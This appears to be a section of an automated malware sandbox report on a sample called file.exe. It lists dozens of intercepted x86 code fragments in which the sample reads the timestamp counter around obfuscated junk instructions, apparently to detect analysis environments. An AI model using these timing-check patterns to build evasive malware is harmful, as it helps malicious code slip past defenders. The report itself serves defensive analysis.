                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229AE4 second address: 1229AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFE0 second address: 122BFED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFED second address: 122BFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C0B9 second address: 122C0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFEB92DE1E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C360 second address: 122C366 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C8A9 second address: 122C8BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C8BB second address: 122C8C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C8C1 second address: 122C8CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CBD2 second address: 122CBD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CBD6 second address: 122CBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CBDC second address: 122CBF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFEB91CA54Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE1E second address: 122CE24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE24 second address: 122CE50 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFEB91CA54Ch 0x00000008 je 00007EFEB91CA546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, FC5Fh 0x00000017 sub edi, 34C93FDFh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jnc 00007EFEB91CA54Ch 0x00000026 jc 00007EFEB91CA546h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE50 second address: 122CE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE56 second address: 122CE6E instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFEB91CA546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnl 00007EFEB91CA546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE6E second address: 122CE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D33C second address: 122D346 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFEB91CA54Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D346 second address: 122D371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007EFEB92DE1F6h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D371 second address: 122D375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122DAD4 second address: 122DAF4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFEB92DE1F8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122DAF4 second address: 122DB00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123034A second address: 123037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007EFEB92DE1E8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D1BEFh], eax 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D2F05h], edi 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D2856h] 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jnc 00007EFEB92DE1E6h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123037D second address: 1230382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231960 second address: 12319AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFEB92DE1E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, 75F40253h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007EFEB92DE1E8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D1A6Bh] 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D1F82h] 0x0000003c push eax 0x0000003d pushad 0x0000003e jo 00007EFEB92DE1ECh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232482 second address: 1232486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232486 second address: 123248C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123248C second address: 1232491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233E34 second address: 1233E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007EFEB92DE1ECh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFEB92DE1EDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234360 second address: 1234385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFEB91CA54Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234385 second address: 1234416 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFEB92DE1ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007EFEB92DE1ECh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007EFEB92DE1E8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c js 00007EFEB92DE1E7h 0x00000032 cld 0x00000033 jmp 00007EFEB92DE1F0h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007EFEB92DE1E8h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 jmp 00007EFEB92DE1EAh 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007EFEB92DE1EBh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235489 second address: 123548E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123548E second address: 1235494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235494 second address: 12354B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007EFEB91CA54Fh 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007EFEB91CA546h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12354B6 second address: 123552D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007EFEB92DE1E8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007EFEB92DE1E8h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 jnl 00007EFEB92DE1ECh 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123552D second address: 1235531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B623 second address: 123B628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B628 second address: 123B634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B634 second address: 123B63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B63D second address: 123B641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B641 second address: 123B6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007EFEB92DE1E8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, esi 0x00000027 sub ebx, dword ptr [ebp+122D2AFAh] 0x0000002d push 00000000h 0x0000002f add bx, A112h 0x00000034 push 00000000h 0x00000036 jno 00007EFEB92DE1FAh 0x0000003c jmp 00007EFEB92DE1F4h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jc 00007EFEB92DE1ECh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B6B0 second address: 123B6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA553h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12316FF second address: 1231704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231704 second address: 1231715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E7E1 second address: 123E829 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007EFEB92DE1ECh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 2FAD4808h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007EFEB92DE1E8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add bh, FFFFFFBFh 0x00000032 push 00000000h 0x00000034 mov edi, esi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a pushad 0x0000003b popad 0x0000003c pop ecx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12417A6 second address: 12417C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007EFEB91CA550h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12346A2 second address: 12346A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12346A6 second address: 12346AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12346AC second address: 12346B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12356D7 second address: 12356DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236682 second address: 1236687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236687 second address: 1236697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123789E second address: 12378A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007EFEB92DE1E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238852 second address: 1238856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238856 second address: 123885C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123885C second address: 1238860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1238944 second address: 1238960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007EFEB92DE1ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12464B0 second address: 12464BC instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB91CA54Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B838 second address: 123B852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B852 second address: 123B8F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007EFEB91CA548h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D2A02h] 0x0000002c add dword ptr [ebp+1244E651h], ecx 0x00000032 push dword ptr fs:[00000000h] 0x00000039 jmp 00007EFEB91CA558h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 call 00007EFEB91CA550h 0x0000004a or di, 6AF0h 0x0000004f pop ebx 0x00000050 mov edi, dword ptr [ebp+122D2CE1h] 0x00000056 mov eax, dword ptr [ebp+122D0505h] 0x0000005c or ebx, dword ptr [ebp+122D35CEh] 0x00000062 push FFFFFFFFh 0x00000064 mov ebx, 3729923Dh 0x00000069 push eax 0x0000006a push ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007EFEB91CA54Bh 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123C915 second address: 123C919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E989 second address: 123E98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123E98E second address: 123EA21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+1244BD32h], ebx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007EFEB92DE1E8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 movzx ebx, dx 0x00000033 mov di, si 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007EFEB92DE1E8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 mov eax, dword ptr [ebp+122D1791h] 0x0000005d jno 00007EFEB92DE1E8h 0x00000063 mov ebx, dword ptr [ebp+122D27B6h] 0x00000069 push FFFFFFFFh 0x0000006b jmp 00007EFEB92DE1EEh 0x00000070 nop 0x00000071 pushad 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123EA21 second address: 123EA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFEB91CA546h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007EFEB91CA554h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFEB91CA54Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240900 second address: 1240906 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124098C second address: 1240990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243A11 second address: 1243A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2309 second address: 11F230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F230F second address: 11F232C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007EFEB92DE1E6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F232C second address: 11F2330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EEA7 second address: 124EEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB92DE1EAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EEC2 second address: 124EEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007EFEB91CA551h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007EFEB91CA546h 0x0000001b js 00007EFEB91CA546h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124EEF2 second address: 124EF15 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFEB92DE1E8h 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007EFEB92DE1F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F078 second address: 124F08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA551h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252A28 second address: 1252A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFEB92DE1F8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252A57 second address: 1252A5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252A5D second address: 1252A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252A63 second address: 1252A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFEB91CA546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1252A6D second address: 1252A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12550C2 second address: 12550C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125516C second address: 1255170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
